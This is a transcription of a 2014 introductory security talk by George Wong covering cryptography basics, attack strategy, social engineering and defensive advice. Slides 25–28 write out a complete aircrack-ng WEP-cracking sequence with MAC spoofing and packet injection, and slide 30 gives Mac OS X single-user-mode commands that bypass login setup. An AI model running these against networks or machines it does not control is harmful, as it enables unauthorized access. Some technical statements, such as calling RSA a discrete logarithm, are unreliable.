ISC. 10 October George Wong

Transcription

1 ISC 10 October 2014 George Wong

2 Sn vs Al Tin was first replaced by aluminum starting in In the late 19th century and early 20th century, tin foil was in common use, and some people continue to refer to the new product by the name of the old one. It tends to give a slight tin taste which is a major reason it has largely been replaced by aluminium and other materials 2

3 Difference? Aluminum The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency f >100 MHz, E_atten > 80 db. Aluminum foil is very effective at attenuating lowfrequency magnetic fields. A thickness of ~10 sheets offers less than 1dB of shielding at 1 khz, ~ 8 db at 10 khz, ~25 db at 100 khz. 3

4 Difference? Aluminum Tin The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency f >100 MHz, E_atten > 80 db. Aluminum foil is very effective at attenuating lowfrequency magnetic fields. A thickness of ~10 sheets offers less than 1dB of shielding at 1 khz, ~ 8 db at 10 khz, ~25 db at 100 khz. 4

5 Don t Trust Anyone! or You have to trust someone. 5

6 PERFECT SECURITY What does it mean? 6

7 PERFECT SECURITY What does it mean? What does that mean? 7

8 PERFECT SECURITY What does it mean? What does that mean? Can we achieve it? 8

9 YES: One-Time Pad (OTP) Bit-wise XOR with randomly generated key. Key must be same length as message Key cannot be reused Not practical! 9

10 Computational Security Function of security parameter (key length) Security increases with time. In practice: No need to exchange keys Computationally easy to perform Computationally hard to break 10

11 Basics of Asymmetric Cryptography YOU External Party Create PRIV-PUB key pair, publish PUB key Get PUB key Encrypt message with PUB and send ciphertext Decrypt ciphertext with PRIV 11

12 Basis for Asymmetric Cryptography One-way functions must exist: Easy to compute, hard (impossible?) to invert Sample methodologies (Cyclic Groups) Discrete Logarithm Elliptic Curve 12

13 Cyclic Group Set of elements with element(s) that generate(s) the others Given an element, hard to find the exponent! 13

14 Discrete Logarithm (RSA) 14

15 Discrete Logarithm (RSA) Given n, e, and b, find a. Breaking this requires: Brute force Factoring n, a (very) large number (NP) 15

16 Elliptic Curve 16

17 Hardcore Attack Strategy Find security flaw Spoof Probe Brute-force Differential Cryptanalysis Exploit (Escalate Privileges) Drop Payload Housekeeping 17

18 Worst Danger of Cryptography Ceiling Tiles! 18

19 Random Numbers Linear Congruence Generator Mersenne Twister Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG) NSA 19

20 In Practice Social Engineering Asking / looking over the shoulder Post-it notes Piggybacking / Tailgating Phishing Keyloggers Cracking (vs Hacking!) Known Exploits (e.g. Heartbleed) Metasploit Kali Linux (i.e. BackTrack 6) 20

21 Certificate Authority (CA) Phonebook, do you trust the distributor? How do you get the public key? VeriSign, Digi-Sign, et al. Limits liability to $100 21

22 MITM Man In The Middle You have to send your data at some point Ettercap, ARP Spoofing and Promiscuous mode Alice Bob Eve 22

23 Cracked Files If a computer can run a file, you can read it and you can modify it! Assembly list of instructions Code injection Validation has to happen somewhere 23

24 Cracked Files so rewrite the code to skip validation! 24

25 WEP (Wired Equivalent Privacy) IV attack $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0 $ aireplay-ng -1 0 a 00:16:B6:B4:66:46 h 00:11:22:33:44:55 e PeteNetLive wlan0 $ aireplay-ng -3 b 00:16:B6:B4:66:46 h 00:11:22:33:44:55 wlan0 $ aircrack-ng b 00:16:B6:B4:66:46 myfile-01.cap 25

26 WEP (Wired Equivalent Privacy) $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 01:3E:04:C1:E0:92 wlan0 $ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0 $ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0 26

27 WEP (Wired Equivalent Privacy) $ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap 27

28 WEP (Wired Equivalent Privacy) $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0 $ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0 $ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0 $ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap 28

29 Windows OphCrack, Cain & Abel, Kon-Boot 29

30 Single User mode Notoriously easy to break into Mac OSX Tools: S Headphones $ /sbin/mount wu / $ rm /var/db/.applesetupdone 30

31 How to avoid the above: Make yourself a bad target Use encryption Update your system Don t publicize the worth of your information 31

32 The rules about keeping your information safe: 1. Your information is not safe. 2. Don t assume you can keep your information safe. 3. If someone tells you your information is safe, see Rule 1. It applies twice now. THANK YOU! 32

33 Resources /2318/2318.strip.gif at PM.png &c. 33